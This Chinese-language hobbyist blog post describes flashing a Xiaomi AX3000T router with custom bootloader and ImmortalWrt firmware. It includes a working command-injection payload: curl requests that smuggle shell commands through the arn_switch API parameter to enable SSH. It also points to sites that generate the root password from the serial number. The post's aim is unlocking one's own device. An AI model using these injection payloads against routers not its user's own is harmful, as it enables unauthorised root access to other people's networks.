写在前边

什么叫前朝遗老呀？(战术后仰）月底还有报销额度没用完，所以就买了个180块钱的ax3000t玩一下。货是下午四点送到的，wifi7的证是晚上八点发的。

就等我变成前朝遗老呢是吧

机器

我对于发哥是十分有好感的，尤其是发哥的路由器soc方案。博通高通什么的，体验真的是远不如发哥。

小米的ax3000t，使用的是非常成熟的方案。

key	value
soc/cpu	MT7981B, aka Filogic 820, A53*2 @1.3GHz, 12nm
内存	256MB ddr3
闪存	128MB
天线	5根！！（3 * 5G+2 * 2.4g）

之所以选择它，一是便宜，刚好在可以买的价钱上，二是没有玩过MT7981B，只玩过她大哥，所以搞来玩玩。

机器的板子id和WR30U是差不多，区别是ax3000t的背面的屏蔽罩没有出料。天线的数量，也不一致。
因为。。。。。。表面上，ax3000t是四根天线，但是她实际上是五根。。。。。。。。。。

链接

• 拆解文章： https://www.acwifi.net/23700.html
• https://www.youtube.com/watch?v=8PeUsbSjSpE

开端与落幕

小米的路由器，在我还上中学的时候吧，刚刚开始推出第一代产品。

但是当时的，乃至以后的很长一段时间里的非旗舰机型，真的可以用电子垃圾来形容。

给我印象最深的，就是这个4c，你很难想象，在我读大学的时间，covid之前的历史时期里，这个屁股上只有三个眼但是四根杆杆的设备，没有5G wifi，百兆口，摆在我大寝室友的桌子上用了四年！而且它要卖79块钱！79块钱啊！而且直到今天，它仍然在小米商城里可以买到！

我真的很难想象，这个玩意和我早古年间，用过的一丢丢大小的150M的单天线水星小路由器有啥区别。

但是到了今天，真的好了一些了，小米的非旗舰路由器，也讲一点良心了，虽然有时候给你搞个升级换代降配置，但是至少没再有三个屁眼四根杆杆的蠢事了。小米的很多机型，也是性价比最高的机型。很大程度上，也是安全性最好的机型（除了故意留的漏洞）。

ax3000t在最近一段时间里，被称为入门的家用wifi6路由器的性价比天花板。

加上今天发的证，很可能是最后的wifi6天花板了。发证，就是涨价的最好理由。虽然wifi7没啥用，虽然不会浪费钱去买wifi7的大多数人也都还没有买wifi6，甚至大学生还在用四根杆杆的100M学姐原味路由器，但是涨价总是好的。

比起高通方案，发哥的温度低，生态好，底子厚实，价格还便宜。虽然驱动是个bin，但是好歹它的bin传到了git上，闭源的也比没有没有强。

刷机

其实我写这篇文章的初衷就是，没有一个很集中的地方写ax3000t的刷机。一方面很少有大佬会买ax3000t这种入门机，另一方面大家都喜欢收点钱，这也是经济下行的侧面体现了。

打开ssh/dropbear

小米的近期机型里，均存在命令注入漏洞。

[STOK]为一个32位16进制的哈希值，在登录小米路由器的后台可以在url中看到。

替换payload中的[STOK]为登陆后获取的有效哈希值，在类bash环境下执行payload。

192.168.31.1是ax3000t一如既往的默认地址。

payload

curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0Anvram%20set%20ssh_en%3D1%0A"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0Anvram%20commit%0A"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%0A"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A"

ssh密码

小米路由器的密码有固定算法，使用sn作为种子生成。

可以在很多孤寡网页中获得，sn的大小写敏感。

• https://miwifi.gq/
• https://mi.tellme.top/

获得的root密码应该是八位长度

连接

dropbear的启动需要10秒左右的时间。

小米的openwrt使用老旧的rsa。连接ssh。

ssh -oHostKeyAlgorithms=+ssh-rsa [email protected]

我们就可以看到熟悉的，小强5.4.171了。

我寻思，你这个小强，还是吃企鹅长大的是吧？哈哈哈哈哈

上传

https://github.com/hanwckf/bl-mt798x/releases/ ， 这里有mt857家族的uboot。要我说，大学生就应该用这种857路由器，上985跳857，四根杆杆哪里配得上双一流大学？

舞池zip里可以看到靓仔mt7981_ax3000t-fip***.bin

使用scp或者是别的姿势上传到tmp

刷入

目标区块FIP

cd /tmp
mtd write mt7981_ax3000t-fip-fixed-parts-multi-layout.bin FIP

插电，开机

拔电后，按住reset按钮，插电。插电后保持10秒左右，会发现led灯颜色变化

特别注意的是，ax3000t和ax6000并不同，并不按照小米祖训，ax3000t在uboot下的ip是192.168.1.1，而不是 192.168.31.1`

路由器后边的眼，有线连入电脑，固定网关为192.168.1.1。

访问192.168.1.1。

刷入

https://github.com/hanwckf/immortalwrt-mt798x

在固件方面，我倾向于大佬写的857家族的immortalwrt。不朽857，难道这个寓意不厚重吗？

值得注意的是，原本的分区（stock）layout方式，是小米的祖传ab，56M模式，我更喜欢不ab，直接用112m的格局。

在编译时，ax3000t厚重的256M内存，并不是很抗折腾，加之最近跑路盛行，clash meta的bug和潜在bug众多，要在她小小的身躯上跑是很容易oom的。大学生嘛，不要对内存进行过度的扩张。

857家族的flash写的真的是非常快，欻的一下就好了。

链接

• https://openwrt.org/toh/xiaomi/redmi_ax6000#getting_stok_token
• https://github.com/hanwckf/bl-mt798x/pull/26

写在后边

我是一个很喜欢买路由器的人。从在大学办公室的那台tomato开始，我就一直走在让大家网络爆炸的路上。不管是有线挂满蜘蛛网，还是无线从窗上桥接游泳馆的网，在大学里玩路由器的日子，真的是太快乐了。那时候大家的包容性很强，哪怕你只有三个眼，哪怕你只有一百兆，大家也能心平气和的继续下去——因为校园网是20M的。